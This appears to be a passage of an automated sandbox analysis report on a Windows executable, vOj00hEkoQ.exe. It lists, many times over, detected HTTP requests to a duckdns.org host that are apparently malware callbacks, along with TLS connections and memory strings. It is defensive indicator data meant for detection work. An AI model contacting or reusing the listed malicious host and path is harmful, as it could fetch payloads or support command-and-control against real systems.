                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: global trafficHTTP traffic detected: GET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1User-Agent: lValiHost: aubromaterkiddie.duckdns.org
                Source: unknownHTTPS traffic detected: 208.67.105.81:443 -> 192.168.2.6:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 208.67.105.81:443 -> 192.168.2.6:49827 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 208.67.105.81:443 -> 192.168.2.6:49945 version: TLS 1.2
                Source: vOj00hEkoQ.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: vOj00hEkoQ.exeBinary or memory string: OriginalFilename vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.409891925.0000000004EA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.448677572.0000000004F86000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.400527616.0000000004780000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.399459326.00000000048F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.378316634.0000000004686000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.492078319.000000000583C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.373258342.000000000540C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.511111350.0000000005838000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.496618464.0000000005828000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.447679692.0000000005554000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.562147869.00000000007E1000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.418411643.000000000586E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.538463758.00000000007A1000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.560338618.00000000007E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.423477581.0000000005280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.392588116.0000000004686000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.468202246.0000000005379000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.387394358.00000000047D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.419258622.0000000005854000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.382686549.00000000047EA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.421615234.0000000005864000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.459364828.000000000497A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.423836069.0000000005934000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.494127353.0000000000720000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.462334431.0000000005562000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.383117461.00000000046C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.369403601.0000000005426000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.382049440.00000000046DA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.568445098.00000000007F2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.503752552.0000000000760000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.526354825.000000000593C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.381732016.00000000047C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
                Source: vOj00hEkoQ.exe, 00000000.00000003.487547510.0000000005746000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs vOj00hEkoQ.exe
